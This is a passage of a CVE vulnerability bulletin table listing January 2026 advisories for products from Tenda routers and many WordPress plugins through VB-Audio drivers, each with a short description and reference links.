| Tenda--Tenda | Tenda AX3 firmware v16.03.12.11 contains a stack-based buffer overflow in the formGetIptv function due to improper handling of the citytag stack buffer, which may result in memory corruption and remote code execution. | 2026-01-21 | not yet calculated | CVE-2025-69766 | https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formGetIptv-2c9a595a7aef8043a091e6722b8e255a?source=copy_link https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formGetIptv-2c9a595a7aef8043a091e6722b8e255a |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the time parameter of the sub_60CFC function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-21 | not yet calculated | CVE-2025-70644 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/3/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the deviceList parameter of the formSetWifiMacFilterCfg function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-21 | not yet calculated | CVE-2025-70645 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/2/1.md |
| Tenda--Tenda | Tenda AX1803 v1.0.0.1 was discovered to contain a stack overflow in the security parameter of the sub_72290 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-21 | not yet calculated | CVE-2025-70646 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1803/5/1.md |
| Tenda--Tenda | Tenda AX1803 v1.0.0.1 was discovered to contain a stack overflow in the security_5g parameter of the sub_727F4 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-21 | not yet calculated | CVE-2025-70648 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1803/6/1.md |
| Tenda--Tenda | Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the deviceList parameter of the formSetMacFilterCfg function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-21 | not yet calculated | CVE-2025-70650 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1806/1/1.md |
| Tenda--Tenda | Tenda AX-1803 v1.0.0.1 was discovered to contain a stack overflow in the ssid parameter of the form_fast_setting_wifi_set function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-01-21 | not yet calculated | CVE-2025-70651 | https://github.com/0-fool/VulnbyCola/blob/main/Tenda/AX-1803/4/1.md |
| The GNU C Library--glibc | Calling wordexp with WRDE_REUSE in conjunction with WRDE_APPEND in the GNU C Library version 2.0 to version 2.42 may cause the interface to return uninitialized memory in the we_wordv member, which on subsequent calls to wordfree may abort the process. | 2026-01-20 | not yet calculated | CVE-2025-15281 | https://sourceware.org/bugzilla/show_bug.cgi?id=33814 |
| Theme-one--The Grid | Missing Authorization vulnerability in Theme-one The Grid the-grid allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects The Grid: from n/a through < 2.8.0. | 2026-01-22 | not yet calculated | CVE-2026-24368 | https://patchstack.com/database/Wordpress/Plugin/the-grid/vulnerability/wordpress-the-grid-plugin-2-8-0-broken-access-control-vulnerability?_s_id=cve |
| themebeez--Cream Magazine | Missing Authorization vulnerability in themebeez Cream Magazine cream-magazine allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Cream Magazine: from n/a through <= 2.1.10. | 2026-01-23 | not yet calculated | CVE-2026-24615 | https://patchstack.com/database/Wordpress/Theme/cream-magazine/vulnerability/wordpress-cream-magazine-theme-2-1-10-broken-access-control-vulnerability?_s_id=cve |
| themebeez--Orchid Store | Missing Authorization vulnerability in themebeez Orchid Store orchid-store allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Orchid Store: from n/a through <= 1.5.15. | 2026-01-23 | not yet calculated | CVE-2026-24612 | https://patchstack.com/database/Wordpress/Theme/orchid-store/vulnerability/wordpress-orchid-store-theme-1-5-15-broken-access-control-vulnerability?_s_id=cve |
| themebeez--Simple GDPR Cookie Compliance | Missing Authorization vulnerability in themebeez Simple GDPR Cookie Compliance simple-gdpr-cookie-compliance allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Simple GDPR Cookie Compliance: from n/a through <= 2.0.0. | 2026-01-23 | not yet calculated | CVE-2026-24604 | https://patchstack.com/database/Wordpress/Plugin/simple-gdpr-cookie-compliance/vulnerability/wordpress-simple-gdpr-cookie-compliance-plugin-2-0-0-broken-access-control-vulnerability?_s_id=cve |
| themebeez--Universal Google Adsense and Ads manager | Missing Authorization vulnerability in themebeez Universal Google Adsense and Ads manager universal-google-adsense-and-ads-manager allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Universal Google Adsense and Ads manager: from n/a through <= 1.1.8. | 2026-01-23 | not yet calculated | CVE-2026-24603 | https://patchstack.com/database/Wordpress/Plugin/universal-google-adsense-and-ads-manager/vulnerability/wordpress-universal-google-adsense-and-ads-manager-plugin-1-1-8-broken-access-control-vulnerability?_s_id=cve |
| Themefic--Hydra Booking | Incorrect Privilege Assignment vulnerability in Themefic Hydra Booking hydra-booking allows Privilege Escalation. This issue affects Hydra Booking: from n/a through <= 1.1.32. | 2026-01-22 | not yet calculated | CVE-2025-68027 | https://patchstack.com/database/Wordpress/Plugin/hydra-booking/vulnerability/wordpress-hydra-booking-plugin-1-1-32-privilege-escalation-vulnerability?_s_id=cve |
| ThemeGoods--Craft | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Craft craftcoffee allows DOM-Based XSS. This issue affects Craft: from n/a through <= 2.3.6. | 2026-01-22 | not yet calculated | CVE-2025-68538 | https://patchstack.com/database/Wordpress/Theme/craftcoffee/vulnerability/wordpress-craft-coffee-shop-cafe-restaurant-wordpress-theme-2-3-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeGoods--DotLife | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods DotLife dotlife allows Reflected XSS. This issue affects DotLife: from n/a through < 4.9.5. | 2026-01-22 | not yet calculated | CVE-2025-68520 | https://patchstack.com/database/Wordpress/Theme/dotlife/vulnerability/wordpress-dotlife-theme-4-9-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeGoods--Grand Magazine | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Magazine grandmagazine allows Reflected XSS. This issue affects Grand Magazine: from n/a through <= 3.5.7. | 2026-01-22 | not yet calculated | CVE-2025-69320 | https://patchstack.com/database/Wordpress/Theme/grandmagazine/vulnerability/wordpress-grand-magazine-theme-3-5-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeGoods--Grand Restaurant Theme Elements for Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Restaurant Theme Elements for Elementor grandrestaurant-elementor allows Stored XSS. This issue affects Grand Restaurant Theme Elements for Elementor: from n/a through <= 2.1.1. | 2026-01-22 | not yet calculated | CVE-2025-63026 | https://patchstack.com/database/Wordpress/Plugin/grandrestaurant-elementor/vulnerability/wordpress-grand-restaurant-theme-elements-for-elementor-plugin-2-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeGoods--Grand Spa | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Spa grandspa allows Reflected XSS. This issue affects Grand Spa: from n/a through <= 3.5.5. | 2026-01-22 | not yet calculated | CVE-2025-69321 | https://patchstack.com/database/Wordpress/Theme/grandspa/vulnerability/wordpress-grand-spa-theme-3-5-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeGoods--Grand Tour | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Tour grandtour allows Reflected XSS. This issue affects Grand Tour: from n/a through < 5.6.2. | 2026-01-22 | not yet calculated | CVE-2025-67952 | https://patchstack.com/database/Wordpress/Theme/grandtour/vulnerability/wordpress-grand-tour-theme-5-6-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeGoods--Hoteller | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Hoteller hoteller allows Reflected XSS. This issue affects Hoteller: from n/a through < 6.8.9. | 2026-01-22 | not yet calculated | CVE-2025-68518 | https://patchstack.com/database/Wordpress/Theme/hoteller/vulnerability/wordpress-hoteller-theme-6-8-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeGoods--Photography | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeGoods Photography photography allows PHP Local File Inclusion. This issue affects Photography: from n/a through < 7.7.5. | 2026-01-22 | not yet calculated | CVE-2025-68510 | https://patchstack.com/database/Wordpress/Theme/photography/vulnerability/wordpress-photography-theme-7-7-5-local-file-inclusion-vulnerability?_s_id=cve |
| ThemeGoods--PhotoMe | Server-Side Request Forgery (SSRF) vulnerability in ThemeGoods PhotoMe photome allows Server Side Request Forgery. This issue affects PhotoMe: from n/a through < 5.7.2. | 2026-01-22 | not yet calculated | CVE-2026-24381 | https://patchstack.com/database/Wordpress/Theme/photome/vulnerability/wordpress-photome-theme-5-7-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| ThemeHunk--Contact Form & Lead Form Elementor Builder | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in ThemeHunk Contact Form & Lead Form Elementor Builder lead-form-builder allows Retrieve Embedded Sensitive Data. This issue affects Contact Form & Lead Form Elementor Builder: from n/a through <= 2.0.1. | 2026-01-22 | not yet calculated | CVE-2025-68046 | https://patchstack.com/database/Wordpress/Plugin/lead-form-builder/vulnerability/wordpress-contact-form-lead-form-elementor-builder-plugin-2-0-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| themepassion--Ultra Portfolio | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in themepassion Ultra Portfolio ultra-portfolio allows Blind SQL Injection. This issue affects Ultra Portfolio: from n/a through <= 6.7. | 2026-01-22 | not yet calculated | CVE-2025-69180 | https://patchstack.com/database/Wordpress/Plugin/ultra-portfolio/vulnerability/wordpress-ultra-portfolio-plugin-6-7-sql-injection-vulnerability?_s_id=cve |
| ThemeREX--Sound | Musical Instruments Online Store | Deserialization of Untrusted Data vulnerability in ThemeREX Sound | Musical Instruments Online Store musicplace allows Object Injection. This issue affects Sound | Musical Instruments Online Store: from n/a through <= 1.6.9. | 2026-01-22 | not yet calculated | CVE-2025-69079 | https://patchstack.com/database/Wordpress/Theme/musicplace/vulnerability/wordpress-sound-musical-instruments-online-store-theme-1-6-9-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| themeton--Consult Aid | Deserialization of Untrusted Data vulnerability in themeton Consult Aid consultaid allows Object Injection. This issue affects Consult Aid: from n/a through <= 1.4.3. | 2026-01-22 | not yet calculated | CVE-2025-67617 | https://patchstack.com/database/Wordpress/Theme/consultaid/vulnerability/wordpress-consult-aid-theme-1-4-3-php-object-injection-vulnerability?_s_id=cve |
| Themeum--Tutor LMS | Authorization Bypass Through User-Controlled Key vulnerability in Themeum Tutor LMS tutor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Tutor LMS: from n/a through <= 3.9.4. | 2026-01-22 | not yet calculated | CVE-2025-47555 | https://patchstack.com/database/Wordpress/Plugin/tutor/vulnerability/wordpress-tutor-lms-plugin-3-9-4-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Themeum--Tutor LMS BunnyNet Integration | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeum Tutor LMS BunnyNet Integration tutor-lms-bunnynet-integration allows DOM-Based XSS. This issue affects Tutor LMS BunnyNet Integration: from n/a through <= 1.0.0. | 2026-01-23 | not yet calculated | CVE-2026-24584 | https://patchstack.com/database/Wordpress/Plugin/tutor-lms-bunnynet-integration/vulnerability/wordpress-tutor-lms-bunnynet-integration-plugin-1-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThimPress--LearnPress – Course Review | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThimPress LearnPress – Course Review learnpress-course-review allows Stored XSS. This issue affects LearnPress – Course Review: from n/a through <= 4.1.9. | 2026-01-22 | not yet calculated | CVE-2026-24361 | https://patchstack.com/database/Wordpress/Plugin/learnpress-course-review/vulnerability/wordpress-learnpress-course-review-plugin-4-1-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Tickera--Tickera | Missing Authorization vulnerability in Tickera Tickera tickera-event-ticketing-system allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Tickera: from n/a through <= 3.5.6.2. | 2026-01-22 | not yet calculated | CVE-2025-67939 | https://patchstack.com/database/Wordpress/Plugin/tickera-event-ticketing-system/vulnerability/wordpress-tickera-plugin-3-5-6-2-broken-access-control-vulnerability?_s_id=cve |
| Timur Kamaev--Kama Thumbnail | Cross-Site Request Forgery (CSRF) vulnerability in Timur Kamaev Kama Thumbnail kama-thumbnail allows Cross Site Request Forgery. This issue affects Kama Thumbnail: from n/a through <= 3.5.1. | 2026-01-23 | not yet calculated | CVE-2026-24521 | https://patchstack.com/database/Wordpress/Plugin/kama-thumbnail/vulnerability/wordpress-kama-thumbnail-plugin-3-5-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| tinyMOTT--tinyMOTT | In tinyMQTT commit 6226ade15bd4f97be2d196352e64dd10937c1962 (2024-02-18), a memory leak occurs due to the broker's failure to validate or reject malformed UTF-8 strings in topic filters. An attacker can exploit this by sending repeated subscription requests with arbitrarily large or invalid filter payloads. Each request causes memory to be allocated for the malformed topic filter, but the broker does not free the associated memory, leading to unbounded heap growth and potential denial of service under sustained attack. | 2026-01-20 | not yet calculated | CVE-2025-56353 | https://github.com/JustDoIt0910/tinyMQTT/issues/19 |
| TMS Global--TMS Global | A path traversal vulnerability exists in TMS Management Console (version 6.3.7.27386.20250818) from TMS Global Software. The "Download Template" function in the profile dashboard does not neutralize directory traversal sequences (../) in the filePath parameter, allowing authenticated users to read arbitrary files, such as the server's Web.config. | 2026-01-22 | not yet calculated | CVE-2025-69612 | http://tms.com https://tmsglobalsoft.com/ https://github.com/Cr0wld3r/CVE-2025-69612/blob/main/PoC.md |
| TMS Global--TMS Global | File Upload vulnerability in TMS Global Software TMS Management Console v.6.3.7.27386.20250818 allows a remote attacker to execute arbitrary code via the Logo upload in /Customer/AddEdit | 2026-01-22 | not yet calculated | CVE-2025-69828 | https://tmsglobalsoft.com https://github.com/ZuoqTr/CVE/blob/main/CVE-2025-69828.md |
| TopDesk--TopDesk | An improper certificate validation vulnerability exists in ToDesktop Builder v0.32.1 This vulnerability allows an unauthenticated, on-path attacker to spoof backend responses by exploiting insufficient certificate validation. | 2026-01-23 | not yet calculated | CVE-2025-67229 | https://www.todesktop.com/changelog https://www.todesktop.com/security/advisories/TDSA-2025-001 |
| TopDesktop--TopDesktop | Improper permissions in the handler for the Custom URL Scheme in ToDesktop Builder v0.33.0 allows attackers with renderer-context access to invoke external protocol handlers without sufficient validation. | 2026-01-23 | not yet calculated | CVE-2025-67230 | https://www.todesktop.com/changelog https://www.todesktop.com/security/advisories/TDSA-2025-002 |
| TopDesktop--TopDesktop | A reflected cross-site scripting (XSS) vulnerability in ToDesktop Builder v0.33.1 allows attackers to execute arbitrary code in the context of a user's browser via a crafted payload. | 2026-01-23 | not yet calculated | CVE-2025-67231 | https://www.todesktop.com/changelog https://www.todesktop.com/security/advisories/TDSA-2025-003 |
| topdevs--Smart Product Viewer | Missing Authorization vulnerability in topdevs Smart Product Viewer smart-product-viewer allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Smart Product Viewer: from n/a through <= 1.5.4. | 2026-01-23 | not yet calculated | CVE-2026-24588 | https://patchstack.com/database/Wordpress/Plugin/smart-product-viewer/vulnerability/wordpress-smart-product-viewer-plugin-1-5-4-broken-access-control-vulnerability?_s_id=cve |
| TP-Link Systems Inc.--Archer C20 v6.0, Archer AX53 v1.0 | Logic vulnerability in TP-Link Archer C20 v6.0 and Archer AX53 v1.0 (TDDP module) allows unauthenticated adjacent attackers to execute administrative commands including factory reset and device reboot without credentials. Attackers on the adjacent network can remotely trigger factory resets and reboots without credentials, causing configuration loss and interruption of device availability. This issue affects Archer C20 v6.0 < V6_251031. Archer AX53 v1.0 < V1_251215 | 2026-01-21 | not yet calculated | CVE-2026-0834 | https://www.tp-link.com/en/support/download/archer-c20/v6/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://mattg.systems/posts/cve-2026-0834/ |
| TP-Link Systems Inc.--Omada Software Controller | A Cross-Site Scripting (XSS) vulnerability was identified in a parameter in Omada Controllers due to improper input sanitization. Exploitation requires advanced conditions, such as network positioning or emulating a trusted entity, and user interaction by an authenticated administrator. If successful, an attacker could execute arbitrary JavaScript in the administrator's browser, potentially exposing sensitive information and compromising confidentiality. | 2026-01-22 | not yet calculated | CVE-2025-9289 | https://support.omadanetworks.com/us/download/ https://support.omadanetworks.com/us/document/114950/ |
| TP-Link Systems Inc.--Omada Software Controller | An authentication weakness was identified in Omada Controllers, Gateways and Access Points, controller-device adoption due to improper handling of random values. Exploitation requires advanced network positioning and allows an attacker to intercept adoption traffic and forge valid authentication through offline precomputation, potentially exposing sensitive information and compromising confidentiality. | 2026-01-22 | not yet calculated | CVE-2025-9290 | https://support.omadanetworks.com/us/download/ https://support.omadanetworks.com/en/download/ https://support.omadanetworks.com/us/document/114950/ |
| Trimble--SketchUp | Trimble SketchUp SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27769. | 2026-01-23 | not yet calculated | CVE-2025-15062 | ZDI-25-1198 |
| Trusona--Trusona for WordPress | Missing Authorization vulnerability in Trusona Trusona for WordPress trusona allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Trusona for WordPress: from n/a through <= 2.0.0. | 2026-01-23 | not yet calculated | CVE-2026-24627 | https://patchstack.com/database/Wordpress/Plugin/trusona/vulnerability/wordpress-trusona-for-wordpress-plugin-2-0-0-broken-access-control-vulnerability?_s_id=cve |
| TYPO3--Extension "Mailqueue" | The extension extends TYPO3' FileSpool component, which was vulnerable to Insecure Deserialization prior to TYPO3-CORE-SA-2026-004 https://typo3.org/security/advisory/typo3-core-sa-2026-004 . Since the related fix is overwritten by the extension, using the extension with a patched TYPO3 core version still allows for Insecure Deserialization, because the affected vulnerable code was extracted from TYPO3 core to the extension. More information about this vulnerability can be found in the related TYPO3 Core Security Advisory TYPO3-CORE-SA-2026-004 https://typo3.org/security/advisory/typo3-core-sa-2026-004 . | 2026-01-20 | not yet calculated | CVE-2026-0895 | https://typo3.org/security/advisory/typo3-ext-sa-2026-001 https://github.com/CPS-IT/mailqueue/commit/fd09aa4e1a751551bae4b228bee814e22f2048db https://github.com/CPS-IT/mailqueue/commit/12a0a35027bb5609917790a94e43bbf117abf733 |
| Unknown--Bookingor | The Bookingor WordPress plugin through 1.0.12 exposes authenticated AJAX actions without capability or nonce checks, allowing low-privileged users to delete Bookingor WordPress plugin through 1.0.12 data. | 2026-01-20 | not yet calculated | CVE-2025-12573 | https://wpscan.com/vulnerability/b6198d76-813c-4f13-8b3d-b4609095ae34/ |
| upnp--upnp | A command injection vulnerability exists in the upnp_relay() function in multiple ipTIME router models because the controlURL value used to pass port-forwarding information to an upper router is passed to system() without proper validation or sanitization, allowing OS command injection. | 2026-01-20 | not yet calculated | CVE-2025-55423 | https://iptime.com/iptime/?pageid=4&page_id=126&dfsid=3&dftid=583&uid=25203&mod=document https://docs.google.com/spreadsheets/d/1kryOFltCmnPJvDTpIrudgryt79uI4PWchuQ8-Gak24c/edit?usp=sharing https://github.com/0x0xxxx/CVE/blob/main/CVE-2025-55423/README.md https://github.com/0x0xxxx/CVE/blob/main/CVE-2025-55423/assets/affected_products_cve_format.json |
| uPress--Booter | Missing Authorization vulnerability in uPress Booter booter-bots-crawlers-manager allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Booter: from n/a through <= 1.5.7. | 2026-01-23 | not yet calculated | CVE-2026-24534 | https://patchstack.com/database/Wordpress/Plugin/booter-bots-crawlers-manager/vulnerability/wordpress-booter-plugin-1-5-7-broken-access-control-vulnerability?_s_id=cve |
| Upsonic--Upsonic | Upsonic Cloudpickle Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Upsonic. Authentication is not required to exploit this vulnerability. The specific flaw exists within the add_tool endpoint, which listens on TCP port 7541 by default. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26845. | 2026-01-23 | not yet calculated | CVE-2026-0773 | ZDI-26-042 |
| uxper--Golo | Missing Authorization vulnerability in uxper Golo golo allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Golo: from n/a through < 1.7.5. | 2026-01-22 | not yet calculated | CVE-2026-23974 | https://patchstack.com/database/Wordpress/Theme/golo/vulnerability/wordpress-golo-theme-1-7-5-broken-access-control-vulnerability?_s_id=cve |
| uxper--Golo | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in uxper Golo golo allows PHP Local File Inclusion. This issue affects Golo: from n/a through < 1.7.5. | 2026-01-22 | not yet calculated | CVE-2026-23975 | https://patchstack.com/database/Wordpress/Theme/golo/vulnerability/wordpress-golo-theme-1-7-5-local-file-inclusion-vulnerability?_s_id=cve |
| VB-Audio Software--Matrix | VB-Audio Matrix and Matrix Coconut (versions ending in 1.0.2.2 and 2.0.2.2 and earlier, respectively), contain a local privilege escalation vulnerability in the VBMatrix VAIO virtual audio driver (vbmatrixvaio64*_win10.sys). The driver allocates a 128-byte non-paged pool buffer and, upon receiving IOCTL 0x222060, maps it into user space using an MDL and MmMapLockedPagesSpecifyCache. Because the allocation size is not page-aligned, the mapping exposes the entire 0x1000-byte kernel page containing the buffer plus adjacent non-paged pool allocations with read/write permissions. An unprivileged local attacker can open a device handle (using the required 0x800 attribute flag), invoke the IOCTL to obtain the mapping, and then read or modify live kernel objects and pointers present on that page. This enables bypass of KASLR, arbitrary kernel memory read/write within the exposed page, corruption of kernel objects, and escalation to SYSTEM. | 2026-01-22 | not yet calculated | CVE-2026-23763 | https://github.com/emkaix/security-research/tree/main/CVE-2026-23763 https://forum.vb-audio.com/viewtopic.php?p=7574#p7574 https://forum.vb-audio.com/viewtopic.php?p=7527#p7527 https://vb-audio.com/ https://www.vulncheck.com/advisories/vb-audio-matrix-drivers-local-privilege-escalation-via-kernel-memory-exposure |
| VB-Audio Software--Voicemeeter (Standard) | VB-Audio Voicemeeter, Voicemeeter Banana, and Voicemeeter Potato (versions ending in 1.1.1.9, 2.1.1.9, and 3.1.1.9 and earlier, respectively), as well as VB-Audio Matrix and Matrix Coconut (versions ending in 1.0.2.2 and 2.0.2.2 and earlier, respectively), contain a vulnerability in their virtual audio drivers (vbvoicemeetervaio64*.sys, vbmatrixvaio64*.sys, vbaudio_vmauxvaio*.sys, vbaudio_vmvaio*.sys, and vbaudio_vmvaio3*.sys). When a handle is opened with a special file attribute value, the drivers improperly initialize FILE_OBJECT->FsContext to a non-pointer magic value. If subsequent operations are not handled by the VB-Audio driver and are forwarded down the audio driver stack (e.g., via PortCls to ks.sys), the invalid FsContext value can be dereferenced, causing a kernel crash (BSoD), typically SYSTEM_SERVICE_EXCEPTION with STATUS_ACCESS_VIOLATION. This flaw allows a local unprivileged user to trigger a denial-of-service on affected Windows systems. | 2026-01-22 | not yet calculated | CVE-2026-23761 | https://github.com/emkaix/security-research/tree/main/CVE-2026-23761 https://forum.vb-audio.com/viewtopic.php?p=7574#p7574 https://forum.vb-audio.com/viewtopic.php?p=7527#p7527 https://vb-audio.com/ https://www.vulncheck.com/advisories/vb-audio-voicemeeter-and-matrix-drivers-dos-via-improper-file-object-fscontext-initialization |
| VB-Audio Software--Voicemeeter (Standard) | VB-Audio Voicemeeter, Voicemeeter Banana, and Voicemeeter Potato (versions ending in 1.1.1.9, 2.1.1.9, and 3.1.1.9 and earlier, respectively), as well as VB-Audio Matrix and Matrix Coconut (versions ending in 1.0.2.2 and 2.0.2.2 and earlier, respectively), contain a vulnerability in their virtual audio drivers (vbvoicemeetervaio64*.sys, vbmatrixvaio64*.sys, vbaudio_vmauxvaio*.sys, vbaudio_vmvaio*.sys, and vbaudio_vmvaio3*.sys). The drivers map non-paged pool memory into user space via MmMapLockedPagesSpecifyCache using UserMode access without proper exception handling. If the mapping fails, such as when a process has exhausted available virtual address space, MmMapLockedPagesSpecifyCache raises an exception that is not caught, causing a kernel crash (BSoD), typically SYSTEM_SERVICE_EXCEPTION with STATUS_NO_MEMORY. This flaw allows a local unprivileged user to trigger a denial-of-service on affected Windows systems. | 2026-01-22 | not yet calculated | CVE-2026-23762 | https://github.com/emkaix/security-research/tree/main/CVE-2026-23762 https://forum.vb-audio.com/viewtopic.php?p=7574#p7574 https://forum.vb-audio.com/viewtopic.php?p=7527#p7527 https://vb-audio.com/ https://www.vulncheck.com/advisories/vb-audio-voicemeeter-and-matrix-drivers-dos-via-mmmaplockedpagesspecifycache |
| VB-Audio Software--Voicemeeter (Standard) | VB-Audio Voicemeeter, Voicemeeter Banana, and Voicemeeter Potato (versions ending in 1.1.1.9, 2.1.1.9, and 3.1.1.9 and earlier, respectively), as well as VB-Audio Matrix and Matrix Coconut (versions ending in 1.0.2.2 and 2.0.2.2 and earlier, respectively), contain a vulnerability in their virtual audio drivers (vbvoicemeetervaio64*.sys, vbmatrixvaio64*.sys, vbaudio_vmauxvaio*.sys, vbaudio_vmvaio*.sys, and vbaudio_vmvaio3*.sys). The drivers allocate non-paged pool and map it into user space, where a length value associated with the allocation is exposed and can be modified by an unprivileged local attacker. On subsequent IOCTL handling, the corrupted length is used directly as the IoAllocateMdl length argument without adequate integrity checks before building and mapping the MDL, which can cause a kernel crash (BSoD), typically PAGE_FAULT_IN_NONPAGED_AREA. This flaw allows a local user to trigger a denial-of-service on affected Windows systems. | 2026-01-22 | not yet calculated | CVE-2026-23764 | https://github.com/emkaix/security-research/tree/main/CVE-2026-23764 https://forum.vb-audio.com/viewtopic.php?p=7574#p7574 https://forum.vb-audio.com/viewtopic.php?p=7527#p7527 https://vb-audio.com/ https://www.vulncheck.com/advisories/vb-audio-voicemeeter-and-matrix-drivers-dos-via-corrupted-ioallocatemdl-length |
| VEGA--VEGA | An issue in Beat XP VEGA Smartwatch (Firmware Version - RB303ATV006229) allows an attacker to cause a denial of service via the BLE connection | 2026-01-22 | not yet calculated | CVE-2025-69821 | https://github.com/CipherX1802/CVE-2025-69821-Beat-XP-Vega-Smartwatch-Security-Assessment/blob/main/BeatXP_Vega_Smartwatch_Security_Assessment_Report.pdf https://github.com/CipherX1802/CVE-2025-69821-Beat-XP-Vega-Smartwatch-Security-Assessment.git |
| VibeThemes--WPLMS | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in VibeThemes WPLMS wplms_plugin allows Path Traversal. This issue affects WPLMS: from n/a through <= 1.9.9.5.4. | 2026-01-22 | not yet calculated | CVE-2025-69097 | https://patchstack.com/database/Wordpress/Plugin/wplms_plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-4-arbitrary-file-deletion-vulnerability?_s_id=cve |
| Vladimir Statsenko--Terms descriptions | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Vladimir Statsenko Terms descriptions terms-descriptions allows DOM-Based XSS. This issue affects Terms descriptions: from n/a through <= 3.4.9. | 2026-01-23 | not yet calculated | CVE-2026-24621 | https://patchstack.com/database/Wordpress/Plugin/terms-descriptions/vulnerability/wordpress-terms-descriptions-plugin-3-4-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Vollstart--Event Tickets with Ticket Scanner | Improper Control of Generation of Code ('Code Injection') vulnerability in Vollstart Event Tickets with Ticket Scanner event-tickets-with-ticket-scanner allows Code Injection. This issue affects Event Tickets with Ticket Scanner: from n/a through <= 2.8.3. | 2026-01-22 | not yet calculated | CVE-2025-68015 | https://patchstack.com/database/Wordpress/Plugin/event-tickets-with-ticket-scanner/vulnerability/wordpress-event-tickets-with-ticket-scanner-plugin-2-7-10-remote-code-execution-rce-vulnerability?_s_id=cve |
| vrpr--WDV One Page Docs | Missing Authorization vulnerability in vrpr WDV One Page Docs wdv-one-page-docs allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WDV One Page Docs: from n/a through <= 1.2.4. | 2026-01-22 | not yet calculated | CVE-2025-68896 | https://patchstack.com/database/Wordpress/Plugin/wdv-one-page-docs/vulnerability/wordpress-wdv-one-page-docs-plugin-1-2-4-broken-access-control-vulnerability?_s_id=cve |
| WANotifier--WANotifier | Missing Authorization vulnerability in WANotifier WANotifier notifier allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WANotifier: from n/a through <= 2.7.12. | 2026-01-22 | not yet calculated | CVE-2025-68020 | https://patchstack.com/database/Wordpress/Plugin/notifier/vulnerability/wordpress-wanotifier-plugin-2-7-12-broken-access-control-vulnerability?_s_id=cve |
